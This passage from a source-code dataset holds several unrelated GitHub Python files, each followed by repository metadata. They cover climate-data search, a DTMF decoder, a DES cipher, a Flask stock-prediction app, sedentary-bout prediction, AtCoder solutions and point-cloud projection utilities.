    for p in a.params:
        k, v = p.split('=')
        params.update({k: v})

    # force these two experiment and variable
    params_force = {
        'experiment_id': 'piControl, abrupt-4xCO2',
        'variable_id': 'tas'}
    params.update(params_force)

    if a.debug:
        esgfsearch.ESGFSearch._enable_debug()

    es = esgfsearch.ESGFSearch(conffile=a.conffile)

    if a.local:
        # Search already-downloaded data on disk.
        es.getLocalDirs(params)
        print('Local Directories:')
        pprint(es.local_dirs)
        es.getDataFiles()
        print('Local Dataset files:')
        pprint(es.data_files)
        datasets = openLocalDatasets(es.data_files)
        if datasets:
            print('Num of datasets:', len(datasets))
        else:
            exit(1)
    else:
        # Query the ESGF index and open the datasets remotely.
        with timer('Do Search'):
            es.doSearch(params)
        with timer('getting Catalog URLs'):
            es.getCatURLs()
        if es.cat_urls:
            pprint(es.cat_urls)
        with timer('getting Dataset URLs'):
            es.getDataURLs()
        if es.data_urls:
            pprint(es.data_urls)
        with timer('getting Dataset'):
            datasets = openDatasets(es.data_urls)
        if datasets:
            print(f'Num of datasets found: {len(datasets)}')
        else:
            exit(1)

    with timer('constructing meta info'):
        meta = composeMeta(datasets)
    outfile = 'meta_info.json'
    Path(outfile).write_text(json.dumps(meta, indent=4))
    # BUG FIX: message typo "wriiten" -> "written".
    print(f'meta info written to {outfile}')

    with timer('drawing graph'):
        # draw timeseries of each dataset
        drawPlot(datasets)
if __name__ == '__main__':
    main()
| RIST-tinoue/cmiputil | samples/pc-ab4co2-ts.py | pc-ab4co2-ts.py | py | 6,877 | python | en | code | 0 | github-code | 90 |
class DTMF:
    """Decoder for DTMF (touch-tone) keypad signals.

    Each stroke is a "columnHz-rowHz" string; see
    https://en.wikipedia.org/wiki/Dual-tone_multi-frequency_signaling
    """

    # Tone-pair -> key table, built once at class level instead of per call.
    # Generalized to include the '*' and '#' keys of the standard keypad.
    _KEYS = {"1336-941": "0",
             "1209-697": "1",
             "1336-697": "2",
             "1477-697": "3",
             "1209-770": "4",
             "1336-770": "5",
             "1477-770": "6",
             "1209-852": "7",
             "1336-852": "8",
             "1477-852": "9",
             "1209-941": "*",
             "1477-941": "#"
             }

    @classmethod
    def _dtmf(cls, keypad_strokes):
        """Translate whitespace-separated tone pairs into the dialled keys."""
        return "".join(cls._KEYS[stroke] for stroke in keypad_strokes.split())

    @classmethod
    def decrypt(cls, message):
        """Decrypts DTMF Cypher :
        Each numeral string represents a key as given in _KEYS

        More at:
        https://en.wikipedia.org/wiki/Dual-tone_multi-frequency_signaling

        Args:
            message (str): encrypted text

        Returns:
            dict: {"DTMF" : [output]}
        """
        try:
            dtmf = cls._dtmf(message)
        except (KeyError, AttributeError):
            # BUG FIX: replaced bare except; unknown tones or non-string input
            # yield "N/A" as before, but real bugs are no longer swallowed.
            dtmf = "N/A"
        return {"DTMF": dtmf}
| bhavyakh/decrypto | decrypto/cipher/dtmf.py | dtmf.py | py | 1,031 | python | en | code | 12 | github-code | 90 |
44086358640 |
# Convert "Greek.txt" (rows of: name  identifier  symbol; 24 upper- then 24
# lower-case letters) into C++ `const std::string` declarations, written to
# "Greekedit.txt".
# BUG FIX: file handles are now closed reliably via `with` blocks.
edits = []
with open("Greek.txt", mode='r', encoding='UTF-8') as file:
    # Upper-case letters: identifier kept as-is.
    for i in range(0, 24):
        line = file.readline()
        if not line: break
        temp = line.split()
        edit = [" //"+temp[0], "\n    const std::string", temp[1]+"(\""+temp[2]+"\");"]
        edits.append(edit)
    # Lower-case letters: identifier lower-cased; echoed for inspection.
    for i in range(0, 24):
        line = file.readline()
        if not line: break
        temp = line.split()
        edit = [" //"+temp[0], "\n    const std::string", temp[1].lower()+"(\""+temp[2]+"\");"]
        print(edit)
        edits.append(edit)

# Sanity check that the console renders Greek characters (mu).
print('\u03BC')

with open("Greekedit.txt", mode='w', encoding='UTF-8') as file:
    for edit in edits:
        for word in edit:
            file.write(word+" ")
        file.write("\n")
70589936618 | from bson.objectid import ObjectId
from naff import Scale, Permissions
from dataclasses import dataclass
"""
This is for your main DB objects.
"""
@dataclass(slots=True)
class User:
    """A user record as stored in the main DB."""
    _id: ObjectId  # MongoDB document id
    id: int  # external user id (presumably a Discord snowflake -- confirm)
@dataclass(slots=True)
class Guild:
    """A guild record as stored in the main DB."""
    _id: ObjectId  # MongoDB document id
    id: int  # external guild id (presumably a Discord snowflake -- confirm)
class AdminScale(Scale):
    """Base Scale whose commands all require the Manage Guild permission."""

    def __init__(self, bot) -> None:
        self.bot = bot
        self.db = bot.db
        self.database = bot.db.db
        # Gate every command in this scale behind the manager check below.
        self.add_scale_check(self.is_manager)

    async def is_manager(self, ctx):
        # Only members holding Manage Guild may run commands in this scale.
        return ctx.author.has_permission(Permissions.MANAGE_GUILD)
41901016084 | import struct
from .core import encode_block, derive_keys
class DesKey():
    """Wrapper around an 8-byte DES key offering encrypt/decrypt helpers."""

    def __init__(self, key: bytes):
        self.__secret = key

    def __hash__(self):
        return hash((self.__class__, self.__secret))

    def encrypt(self, message: bytes, padding=True):
        """Encrypt `message` with this key (PKCS5-padded first when `padding`)."""
        return handle_cipher(message, self.__secret, padding, True)

    def decrypt(self, message: bytes, padding=True):
        """Decrypt `message` with this key (PKCS5 padding stripped when `padding`)."""
        return handle_cipher(message, self.__secret, padding, False)
def handle_cipher(message, key, padding, encryption):
    """Run DES over `message` in 8-byte ECB blocks.

    `encryption` selects direction; when decrypting with `padding`, the PKCS5
    pad is stripped from the result. NOTE(review): input validation uses
    `assert`, which is stripped under `python -O`.
    """
    assert isinstance(key, bytes), "The key should be `bytes` or `bytearray`"
    assert len(key) == 8, "The key should be of length 8"
    message = guard_message(message, padding, encryption)
    dkeys = tuple(derive_keys(key))
    # Unpack the message into big-endian 64-bit block integers.
    blocks = (struct.unpack(">Q", message[i: i + 8])[0]
              for i in range(0, len(message), 8))
    encoded_blocks = []
    for block in blocks:
        encoded_blocks.append(encode_block(block, dkeys, encryption))
    ret = b"".join(struct.pack(">Q", block) for block in encoded_blocks)
    # On decryption, the last byte encodes the PKCS5 pad length to strip.
    return ret[:-ord(ret[-1:])] if not encryption and padding else ret
def guard_message(message, padding, encryption):
    """Validate `message` and apply PKCS5 padding when encrypting with padding."""
    assert isinstance(message, bytes), "The message should be bytes"
    length = len(message)

    # PKCS5 padding: pad up to the next full 8-byte block, each pad byte
    # holding the pad length (a whole extra block when already aligned).
    if encryption and padding:
        pad_len = 8 - (length & 7)
        return message + bytes((pad_len,)) * pad_len

    assert length & 7 == 0, (
        "The length of the message should be divisible by 8"
        "(or set `padding` to `True` in encryption mode)"
    )
    return message
| SingularityUrBrain/network-security | Kerberos_des/des/base.py | base.py | py | 1,559 | python | en | code | 0 | github-code | 90 |
5838023357 | from __future__ import print_function
import subprocess
import configparser
import copy
import datetime as dt
import math
import numpy as np
import pandas as pd
from pandas.tseries.offsets import *
from sklearn.tree import DecisionTreeClassifier, export_graphviz
from scipy.stats.stats import spearmanr
# Read user settings and load the sedentary-behavior training data.
config = configparser.ConfigParser()
config.read('user.ini')
user_id = config.get('default', 'user_id')
fitbit_user_data_dir = config.get('default', 'data_for_analysis')
today = config.get('default', 'today')
# *4 converts hours into 15-minute slots (presumably; confirm against data).
day_start_time = float(config.get('default', 'day_start_time')) * 4
day_end_time = float(config.get('default', 'day_end_time')) * 4

# sed_test_filename = fitbit_user_data_dir + user_id + '_sed_test.csv'
# sed_test = pd.read_csv(sed_test_filename, index_col='time_of_day', header=0, encoding='ISO-8859-1')
# print(sed_test.head())
sed_train_filename = fitbit_user_data_dir + user_id + '_sed_train.csv'
sed_train = pd.read_csv(sed_train_filename, index_col='time_of_day', header=0, encoding='ISO-8859-1')
sed_train = sed_train.reset_index()
print(len(sed_train))
# Hold out ~19 days (96 slots/day) before the last day as the test split.
sed_test = sed_train[-96*20:-96]
sed_test = sed_test.reset_index()
sed_train = sed_train[:(len(sed_train)-96*20)]
def predict_sed(train, test):
    """Fit a decision tree on `train` and predict prolonged sedentary bouts for `test`.

    Uses feature columns '1', '2', '3' to predict 'sed_prolong'; prints train
    and test accuracy and returns a copy of `test` with a 'predicted' column.
    """
    features = ['1', '2', '3']
    y = train['sed_prolong']
    x = train[features]
    tree = DecisionTreeClassifier(min_samples_split=50)
    tree = tree.fit(x, y)
    # check self prediction accuracy
    accuracy = tree.score(x, y)
    print(accuracy)
    # predict sedentary bouts
    x_predict = test[features]
    y_predicted = tree.predict(x_predict)
    # BUG FIX: copy before adding the prediction column so the caller's
    # `test` frame is not mutated in place.
    result_compare = test.copy()
    result_compare['predicted'] = y_predicted
    print("prediction accuracy based on test data is %f " % tree.score(test[features], test['sed_prolong']))
    return result_compare
# Run the prediction on the held-out split and inspect the first rows.
results = predict_sed(sed_train, sed_test)
print(results.head())

from matplotlib import pyplot
# Optional visual check of predicted vs. actual values:
# pyplot.plot(results['predicted'])
# pyplot.show()
# pyplot.plot(results['value'], color='red')
# pyplot.show()
# get predicted_sed_prolong_start_time
def get_sed_prolong_start_time(data, reference_col, new_col_name):
    """Mark prolonged sedentary bouts in-place.

    For each run of consecutive 15-minute slots where `reference_col` == 1,
    `new_col_name` at the run's first row counts how many further consecutive
    slots follow it (the bout length minus one). Mutates and returns `data`.
    """
    # find: 1. starting time of prolonged sedentary behavior, 2. length of each prolonged sedentary time
    # m points at the start of the current candidate bout; n scans forward.
    data[new_col_name] = 0
    m = 0
    n = 1
    while n < len(data):
        if data.loc[m, reference_col] == 1:
            if data.loc[n, reference_col] == 1:
                # check if consecutive
                t_1 = pd.to_datetime(data.loc[n - 1, 'date'] + ' ' + data.loc[n - 1, 'time'])  # TODO: modify timestamp representation
                t_2 = pd.to_datetime(data.loc[n, 'date'] + ' ' + data.loc[n, 'time'])
                time_delta = t_2 - t_1
                if time_delta == dt.timedelta(minutes=15):
                    # Still the same bout: extend the count at the start row.
                    data.loc[m, new_col_name] += 1
                    n += 1
                else:
                    # Gap in time: restart the bout at n.
                    m = n
                    n = m + 1
            else:
                # Bout ended: next candidate start is the row after n.
                m = n + 1
                n = m + 1
        else:
            m = n
            n += 1
    return data
# Annotate the predicted bouts with their start times and lengths.
new_results = get_sed_prolong_start_time(results, 'predicted', 'predicted_sed_prolong_start_time')
print(new_results.head())
def get_notification(predicted, reference_col):
    """Build break-reminder notifications for prolonged sitting bouts.

    Rows whose `reference_col` count is >= 5 (i.e. bouts of at least ~1.5h)
    get one reminder per 1.5 hours, starting 1.5h after the bout begins.
    Returns (and prints) a DataFrame with 'date_time' and 'notification'.
    """
    bouts = copy.deepcopy(predicted)
    bouts = bouts[bouts[reference_col] >= 5].reset_index()
    date_time = []
    notification = []
    for i in bouts.index:
        num_msg = math.floor((bouts.loc[i, reference_col] + 1) / 6)
        start_time = pd.to_datetime(bouts.date_time[i]) + DateOffset(hours=1.5)
        for _ in range(num_msg):
            date_time.append(start_time)
            notification.append("Would you like to take a break?")
            start_time = start_time + DateOffset(hours=1.5)
    notification = pd.DataFrame({'date_time': date_time, 'notification': notification})
    print("notifications generated as follow")
    print(notification)
    return notification
# Generate reminders from both the observed and the predicted bouts.
get_notification(new_results, 'sed_prolong_start_time')
get_notification(new_results, 'predicted_sed_prolong_start_time')
| salomeow/fyp_server_py | 3_predict_sed.py | 3_predict_sed.py | py | 4,314 | python | en | code | 0 | github-code | 90 |
36293447394 | # -*- coding: utf-8 -*-
"""
Created on Sun Oct 9 13:08:47 2022
@author: qomon
"""
def consumer_info(name, surname, birth, place, email='', number=None):
    """Bundle a consumer's details into a dictionary record."""
    return {
        'name': name,
        'surname': surname,
        'birth': birth,
        'place': place,
        'email': email,
        'number': number,
    }
# Interactively collect consumer records until the user stops answering "yes",
# then print a summary line per consumer.
from datetime import date

print('Please, give information about the consumer:')
consumers = []
while True:
    name = input('Please write consumer name:')
    surname = input('please write the surname: ')
    birth = int(input('please write year of birth:'))
    place = input("please write your birth place:")
    email = input('please write email address: ')
    number = input("please write the phone number: ")
    consumers.append(consumer_info(name, surname, birth, place, email, number))
    answer = input('Do you want to keep on? yes/no ')
    if answer != 'yes':
        break

print('Consumers:')
# BUG FIX: age was computed against a hard-coded year 2020.
current_year = date.today().year
for consumer in consumers:
    print(f'{consumer["name"].title()} {consumer["surname"].title()}.'
          f"{consumer['birth']} born in {consumer['place']}."
          f"he/she is {current_year - consumer['birth']}, phone number is {consumer['number']}.")
24008790433 | from make_prediction import make_prediction, data_merge, preprocess_headlines, preprocess_posts, classify_news, calc_change_sentiment, get_news,get_stock,get_tweets
import flask
from flask import request
from markupsafe import escape
from flask import render_template,Flask, redirect, url_for, request
app = flask.Flask(__name__)
@app.route('/')
def home():
    """Serve the landing page template."""
    return flask.render_template('index.html')
@app.route('/about')
def read_me():
    """Return the project description as plain text."""
    blurb = ("Final project for LighthouseLabs Data Science Bootcamp. The goal of the project is to use historical stock data in conjunction with sentiment analysis of news headlines and Twitter posts, to predict the future price of a stock of interest. The headlines were obtained by scraping the website, FinViz, while tweets were taken using Tweepy. Both were analyzed using the Vader Sentiment Analyzer.")
    return blurb
@app.route('/search', methods=['POST', 'GET'])
def login():
    """Render the stock page; run a prediction when a ticker is supplied.

    NOTE(review): the ticker is read from the query string
    (``request.args``) even for POST requests -- confirm the form
    submits via GET or query parameters rather than a POST body.
    """
    if not request.args:
        # No ticker yet: show the empty search page.
        return flask.render_template('stock.html')
    company, prediction = make_prediction(request.args['ticker'])
    return flask.render_template('stock.html',
                                 company=company.upper(),
                                 prediction=prediction)
if __name__=="__main__":
    # app.run() blocks until the server shuts down, so the second
    # unconditional app.run() in the original could never execute and
    # has been removed.  For public serving use
    # app.run(host='0.0.0.0') with debug disabled.
    app.run(debug=True)
# if __name__ == '__main__':
# from pprint import pprint
# pprint("Checking to see what empty string predicts")
# pprint('input string is ')
# ticker = 'wmt'
# pprint(ticker)
# x_input, probs = predict_price(ticker)
# pprint(f'Input values: {x_input}')
# pprint(probs) | keatonmaruyali/LighthouseLabs_DS_Final | app.py | app.py | py | 1,686 | python | en | code | 8 | github-code | 90 |
37118933073 | # ### Ex.4: Find the Duplicate Number
# Given an array nums containing n + 1 integers
# where each integer is between 1 and n (inclusive),
# prove that at least one duplicate number must exist.
# Assume that there is only one duplicate number, find the duplicate one.
# Note:
# You must not modify the array (assume the array is read only).
# You must use only constant, O(1) extra space.
# Your runtime complexity should be less than O(n2).
# There is only one duplicate number in the array, but it could be repeated more than once.
def findDuplicate(nums):
    """Locate the repeated value in *nums*.

    nums holds n + 1 integers drawn from 1..n, so by pigeonhole at least
    one value repeats.  Binary-search the *value range* (not the array):
    if more than mid elements are <= mid, the duplicate lies in [lo, mid].
    O(n log n) time, O(1) extra space, array left unmodified.
    """
    lo, hi = 1, len(nums) - 1
    while lo < hi:
        mid = (lo + hi) // 2
        # Count how many elements fall in the range [1, mid].
        below = sum(1 for value in nums if value <= mid)
        if below > mid:
            hi = mid          # duplicate is within [lo, mid]
        else:
            lo = mid + 1      # duplicate is within [mid + 1, hi]
    return lo
# Smoke test: 3 is the repeated value in this sample.
nums = [3, 5, 6, 3, 1, 4, 2]
print(findDuplicate(nums))
| nanw01/python-algrothm | Python Algrothm Advanced/practice/050204findDuplicate.py | 050204findDuplicate.py | py | 905 | python | en | code | 1 | github-code | 90 |
18473908389 | N, X = map(int, input().split())
# Accumulator for the printed answer.  The loop appears to walk a
# perfect binary tree: 2**(i+1) - 1 is the node count of a complete
# subtree of height i, and N and X are read on the (garbled) line
# above -- TODO confirm against the original contest problem statement.
ans = 0
for i in range(N, -1, -1):
    if X < 2**(i + 1) - 1:
        # X lies strictly inside the left subtree: step past its root.
        X -= 1
    elif X > 2 ** (i + 1) - 1:
        # X lies in the right subtree: skip the whole left subtree.
        X -= 2 ** (i + 1) - 1
        ans += 2 ** i
    else:
        # X is exactly the subtree size: take this level and stop.
        ans += 2 ** i
        break
    if X == 0:
        break
#print(X, ans)
print(ans)
18420027689 | # abc124_c.py
# https://atcoder.jp/contests/abc124/tasks/abc124_c
# C - Coloring Colorfully /
# 実行時間制限: 2 sec / メモリ制限: 1024 MB
# 配点 : 300点
# 問題文
# 左右一列に N枚のタイルが並んでおり、各タイルの初めの色は長さ N の文字列 Sで表されます。
# 左から i番目のタイルは、S の i番目の文字が 0 のとき黒色で、1 のとき白色で塗られています。
# あなたは、いくつかのタイルを黒色または白色に塗り替えることで、どの隣り合う 2枚のタイルも異なる色で塗られているようにしたいです。
# 最小で何枚のタイルを塗り替えることで条件を満たすようにできるでしょうか。
# 制約
# 1≤|S|≤105
# Siは 0 または 1 である。
# 入力
# 入力は以下の形式で標準入力から与えられる。
# S
# 出力
# 条件を満たすために塗り替えるタイルの枚数の最小値を出力せよ。
# 入力例 1
# 000
# 出力例 1
# 1
# 中央のタイルを白色に塗り替えれば条件を達成できます。
# 入力例 2
# 10010010
# 出力例 2
# 3
# 入力例 3
# 0
# 出力例 3
# 0
# NOTE: ``global`` has no effect at module scope; FLAG_LOG is simply a
# module-level switch (read by log(), toggled by get_mode()).
global FLAG_LOG
FLAG_LOG = False
def log(value):
    """Print *value* only when the module-wide FLAG_LOG switch is on."""
    if not FLAG_LOG:
        return
    print(str(value))
def calculation(lines):
    """Solve ABC124 C: minimum repaints so adjacent tiles alternate.

    lines[0] is a string of '0' (black) and '1' (white) tiles.  A valid
    colouring alternates, so it is either black-on-even/white-on-odd or
    the reverse; return the cheaper repaint count as a 1-element list.
    """
    tiles = lines[0]
    even_black = even_white = odd_black = odd_white = 0
    # Tally tile colours separately for even and odd positions.
    for pos, tile in enumerate(tiles):
        black = (tile == '0')
        if pos % 2 == 0:
            if black:
                even_black += 1
            else:
                even_white += 1
        elif black:
            odd_black += 1
        else:
            odd_white += 1
    log(even_black)
    log(even_white)
    log(odd_black)
    log(odd_white)
    # Decide which parity class should end up black: the comparison is
    # equivalent to min(even_white + odd_black, odd_white + even_black).
    if even_black - even_white > odd_black - odd_white:
        # Pattern even=black / odd=white: repaint the misfits.
        repaint = even_white + odd_black
    else:
        # Pattern even=white / odd=black.
        repaint = odd_white + even_black
    return [repaint]
# Read the program input (original comment: 引数を取得).
def get_input_lines(lines_count):
    """Read ``lines_count`` lines from standard input."""
    return [input() for _ in range(lines_count)]
# Canned sample cases (original comment: テストデータ).
def get_testdata(pattern):
    """Return (input_lines, expected_output) for sample case *pattern*.

    Raises:
        ValueError: if *pattern* is not a known sample case.  (The
            original fell through and died with UnboundLocalError.)
    """
    samples = {
        1: (['000'], [1]),
        2: (['10010010'], [3]),
        3: (['0'], [0]),
    }
    try:
        lines_input, lines_export = samples[pattern]
    except KeyError:
        raise ValueError(f'unknown test pattern: {pattern}') from None
    return lines_input, lines_export
# Determine the run mode from the command line (original: 動作モード判別).
def get_mode():
    """Return 0 (read from stdin, logging off) when no argument is
    given, otherwise the test-case number from argv[1] with logging on.
    """
    import sys
    global FLAG_LOG
    argv = sys.argv
    if len(argv) > 1:
        FLAG_LOG = True
        return int(argv[1])
    FLAG_LOG = False
    return 0
# Main driver (original comment: 主処理).
def main():
    """Read input (or canned test data), run calculation(), print results.

    The dead timing scaffolding (``time`` import, unused ``started``
    timestamp) and the commented-out self-check block from the original
    have been removed; they were never executed.
    """
    mode = get_mode()
    if mode == 0:
        lines_input = get_input_lines(1)
    else:
        # Test mode: expected output is available but only the computed
        # results are printed (matching the original behaviour).
        lines_input, lines_export = get_testdata(mode)
    for line_result in calculation(lines_input):
        print(line_result)
# Entry point (original comment: 起動処理).
if __name__ == '__main__':
    main()
| Aasthaengg/IBMdataset | Python_codes/p03073/s890499377.py | s890499377.py | py | 4,180 | python | ja | code | 0 | github-code | 90 |
18333051919 | S = list(input())
K = int(input())
# S (read as list(input()) on the garbled line above) is conceptually
# repeated K times; count the minimum character changes so that no two
# neighbours are equal -- presumably an AtCoder task; TODO confirm.
if len(set(S)) == 1:
    # Uniform string: every second character of the K copies changes.
    print(len(S)*K //2)
else:
    # Run-length encode S: cnt[i] is the length of the i-th equal-run.
    cnt = [1]
    for i in range(len(S)-1):
        if S[i] == S[i+1]:
            cnt[-1] += 1
        else:
            cnt.append(1)
    res = 0
    # Each run of length c needs c//2 changes, in each of the K copies.
    for c in cnt:
        res += c//2*K
    # If S ends and starts with the same character, the first and last
    # runs merge at each of the K-1 copy junctions; correct the parity.
    if S[0] == S[-1]:
        if (cnt[0]+cnt[-1])%2 == 0:
            res += K-1
    print(res)
def is_prime(num):
    """Return True if *num* is a prime number.

    Fixes the original, which reported 1, 0 and negatives as prime (its
    trial-division loop never ran for num < 3).  Trial division now
    stops at sqrt(num), improving O(n) to O(sqrt(n)).
    """
    if num < 2:
        return False
    for cand in range(2, int(num ** 0.5) + 1):
        if num % cand == 0:
            return False
    return True
def prime_range(num):
    """Yield every prime p with 2 <= p <= num, in increasing order."""
    for candidate in range(2, num + 1):
        if is_prime(candidate):
            yield candidate
def prime_factors(num):
    """Return the prime factorisation of *num* as an ascending list
    with multiplicity, e.g. 12 -> [2, 2, 3].  Returns [] for num <= 1."""
    factors = []
    divisor = 2
    while num > 1:
        if num % divisor == 0:
            # divisor is prime here: all smaller factors were removed.
            num //= divisor
            factors.append(divisor)
        else:
            divisor += 1
    return factors
43057812930 | import os
import time
import torch
import numpy as np
import open3d as o3d
from PIL import Image
class AverageMeter(object):
    """Track the running mean and (population) variance of a streamed
    scalar value."""
    def __init__(self):
        self.reset()
    def reset(self):
        """Clear all accumulated statistics."""
        self.val = 0
        self.avg = 0
        self.sum = 0.0
        self.sq_sum = 0.0
        self.count = 0
    def update(self, val, n=1):
        """Fold in *val*, observed *n* times."""
        self.val = val
        self.count += n
        self.sum += val * n
        self.avg = self.sum / self.count
        self.sq_sum += val ** 2 * n
        # Population variance: E[x^2] - E[x]^2.
        self.var = self.sq_sum / self.count - self.avg ** 2
class Timer(object):
    """Accumulating stopwatch: tic() starts a lap, toc() stops and
    records it."""
    def __init__(self, binary_fn=None, init_val=0):
        self.total_time = 0.
        self.calls = 0
        self.start_time = 0.
        self.diff = 0.
        # Optional reducer folded over successive lap times, seeded
        # with init_val (e.g. ``max`` to track the slowest lap).
        self.binary_fn = binary_fn
        self.tmp = init_val
    def reset(self):
        """Zero the counters (the reducer state ``tmp`` is kept)."""
        self.total_time = 0
        self.calls = 0
        self.start_time = 0
        self.diff = 0
    @property
    def avg(self):
        """Mean lap duration over all toc() calls."""
        return self.total_time / self.calls
    def tic(self):
        # time.time() rather than time.clock so multithreading does not
        # skew the measurement.
        self.start_time = time.time()
    def toc(self, average=True):
        """Stop the lap; return the running average (or this lap)."""
        self.diff = time.time() - self.start_time
        self.total_time += self.diff
        self.calls += 1
        if self.binary_fn:
            self.tmp = self.binary_fn(self.tmp, self.diff)
        return self.avg if average else self.diff
class nn_match():
    """Nearest-neighbour matching between two descriptor sets, computed
    in fixed-size chunks to bound the pairwise-distance matrix memory."""
    def __init__(self, nn_max_n = 500) -> None:
        # Maximum number of F0 rows per pairwise-distance chunk.
        self.nn_max_n = nn_max_n
    def pdist(self, A, B, dist_type='L2'):
        """Pairwise distances between rows of A (N, D) and B (M, D).

        'L2' returns Euclidean distance (1e-7 epsilon inside the sqrt
        for numerical stability); 'SquareL2' returns squared distance.
        Result shape is (N, M).
        """
        if dist_type == 'L2':
            D2 = torch.sum((A.unsqueeze(1) - B.unsqueeze(0)).pow(2), 2)
            return torch.sqrt(D2 + 1e-7)
        elif dist_type == 'SquareL2':
            return torch.sum((A.unsqueeze(1) - B.unsqueeze(0)).pow(2), 2)
        else:
            raise NotImplementedError('Not implemented')
    def find_nn_gpu(self, F0, F1, nn_max_n=-1, return_distance=False, dist_type='SquareL2'):
        """For each row of F0, the index of its nearest row in F1.

        Returns a length-N index tensor (on CPU); with
        return_distance=True also an (N, 1) tensor of distances.
        When nn_max_n > 1, F0 is processed in chunks of that size so the
        (chunk, M) distance matrix stays bounded.
        """
        # Too much memory if F0 or F1 large. Divide the F0
        if nn_max_n > 1:
            N = len(F0)
            C = int(np.ceil(N / nn_max_n))
            stride = nn_max_n
            dists, inds = [], []
            for i in range(C):
                dist = self.pdist(F0[i * stride:(i + 1) * stride], F1, dist_type=dist_type)
                min_dist, ind = dist.min(dim=1)
                dists.append(min_dist.detach().unsqueeze(1).cpu())
                inds.append(ind.cpu())
            # NOTE: defensive tail handling; since C = ceil(N / stride),
            # C * stride >= N always holds and this branch never runs.
            if C * stride < N:
                dist = self.pdist(F0[C * stride:], F1, dist_type=dist_type)
                min_dist, ind = dist.min(dim=1)
                dists.append(min_dist.detach().unsqueeze(1).cpu())
                inds.append(ind.cpu())
            dists = torch.cat(dists)
            inds = torch.cat(inds)
            assert len(inds) == N
        else:
            dist = self.pdist(F0, F1, dist_type=dist_type)
            min_dist, inds = dist.min(dim=1)
            dists = min_dist.detach().unsqueeze(1).cpu()
            inds = inds.cpu()
        if return_distance:
            return inds, dists
        else:
            return inds
    def find_knn_gpu(self, F0, F1, nn_max_n=-1, k=2, return_distance=False, dist_type='SquareL2'):
        """For each row of F0, the indices of its k nearest rows in F1.

        topk is taken over the *negated* distances (topk returns the
        largest values).  Indices come back as (N, k); distances, when
        requested, as (N, 1, k) because of the extra unsqueeze(1).
        """
        # Too much memory if F0 or F1 large. Divide the F0
        if nn_max_n > 1:
            N = len(F0)
            C = int(np.ceil(N / nn_max_n))
            stride = nn_max_n
            dists, inds = [], []
            for i in range(C):
                dist = self.pdist(F0[i * stride:(i + 1) * stride], F1, dist_type=dist_type)
                min_dist, ind = torch.topk(-dist, k, dim=1)
                dists.append(-min_dist.detach().unsqueeze(1).cpu())
                inds.append(ind.cpu())
            # Dead branch as in find_nn_gpu: ceil already covers the tail.
            if C * stride < N:
                dist = self.pdist(F0[C * stride:], F1, dist_type=dist_type)
                min_dist, ind = torch.topk(-dist, k, dim=1)
                dists.append(-min_dist.detach().unsqueeze(1).cpu())
                inds.append(ind.cpu())
            dists = torch.cat(dists,dim=0)
            inds = torch.cat(inds,dim=0)
            assert len(inds) == N
        else:
            dist = self.pdist(F0, F1, dist_type=dist_type)
            min_dist, inds = torch.topk(-dist, k, dim=1)
            dists = -min_dist.detach().unsqueeze(1).cpu()
            inds = inds.cpu()
        if return_distance:
            return inds, dists
        else:
            return inds
    def find_corr(self, F0, F1, subsample_size=-1, mutual = True):
        """Return correspondence index arrays (inds0, inds1) into the
        original F0/F1 rows.

        With subsample_size > 0 a random subset of each set is matched.
        With mutual=True only pairs that are each other's nearest
        neighbour are kept.
        NOTE(review): if the mutual check yields no matches, ``matches``
        is 1-D and the [:, 0] indexing below would fail -- confirm
        callers guarantee at least one mutual match.
        """
        #init
        inds0, inds1 = np.arange(F0.shape[0]), np.arange(F1.shape[0])
        if subsample_size > 0:
            N0 = min(len(F0), subsample_size)
            N1 = min(len(F1), subsample_size)
            inds0 = np.random.choice(len(F0), N0, replace=False)
            inds1 = np.random.choice(len(F1), N1, replace=False)
            F0, F1 = F0[inds0], F1[inds1]
        # Compute the nn
        nn_inds_in1 = self.find_nn_gpu(F0, F1, nn_max_n=self.nn_max_n)
        if not mutual:
            inds1 = inds1[nn_inds_in1]
        else:
            matches = []
            nn_inds_in0 = self.find_nn_gpu(F1, F0, nn_max_n=self.nn_max_n)
            for i in range(len(nn_inds_in1)):
                if i == nn_inds_in0[nn_inds_in1[i]]:
                    matches.append((i, nn_inds_in1[i]))
            matches = np.array(matches).astype(np.int32)
            inds0 = inds0[matches[:,0]]
            inds1 = inds1[matches[:,1]]
        return inds0, inds1
class dpt_3d_convert():
    """Depth-map / point-cloud projection helpers built around pinhole
    intrinsics (3x3) and camera extrinsics (4x4)."""
    def __init__(self):
        pass
    def to_harmonic(self, input):
        """Append a homogeneous 1-column: (M, k) -> (M, k+1)."""
        M = input.shape[0]
        input = np.concatenate([input, np.ones([M,1])],axis=1)
        return input
    def proj_2to3(self, uv, depth, intrinsic, extrinsic, depth_unit = 1000):
        """Back-project pixels + depths to world coordinates.

        depth is divided by depth_unit (presumably depth stored in
        millimetres when depth_unit=1000 -- TODO confirm).
        """
        # input:
        # uv M*2 the image coordinates of predicted pairs on sample image
        # depth M the depth of the matched voxels of sample image
        # intrinsic 3*3 the intrinsic matrix
        # extrinsic 4*4 the extrinsic matrix the the sample/depth image
        # output:
        # M*3 world coordinates of the input pixels
        # formula xyz = extrinsic@(inv(intrinsic)@uvd)
        uv_harmonic = self.to_harmonic(uv)
        uv_harmonic = uv_harmonic * depth[:,None]/depth_unit
        camera_coor = (np.linalg.inv(intrinsic) @ uv_harmonic.T).T
        camera_coor = self.to_harmonic(camera_coor)
        world_coor = (extrinsic @ camera_coor.T).T
        return world_coor[:,0:3]
    def proj_3to2(self, xyz, intrinsic, extrinsic):
        """Project world points to pixel coordinates and depths.

        The 1e-5 epsilon guards the perspective division against
        zero depth.
        """
        # input:
        # xyz M*3 the xyz points
        # intrinsic 3*3 the intrinsic matrix
        # extrinsic 4*4 the extrinsic matrix the the sample/depth image
        # output:
        # uv (M*2 pixel coordinates) and d (M depths)
        # formula uvd=intrinsic(inv(extrinsic)@xyz)
        xyz = self.to_harmonic(xyz)
        xyz = np.linalg.inv(extrinsic) @ xyz.T
        uvd = intrinsic @ xyz[0:3]
        uvd = uvd.T
        uv, d = uvd[:,0:2]/(uvd[:,-1:]+1e-5), uvd[:,-1]
        return uv, d
    def proj_depth(self, depth, intrinsic, extrinsic = np.eye(4), depth_unit = 1000,
                   filter_edge = False, window_s = 3, max_range = 0.2,
                   return_uv = False,
                   filter_far = False, far_thres = 80,
                   filter_near = False, near_thres = 0.01):
        """Unproject a full depth image into a point cloud.

        Optional filters: filter_edge drops pixels whose local
        window_s-neighbourhood depth spread exceeds max_range (note:
        this is an O(h*w*window^2) pure-Python loop, and pixels in the
        first window_s rows/columns are always masked out);
        filter_far/filter_near clip by absolute depth.
        """
        if depth.ndim>2:
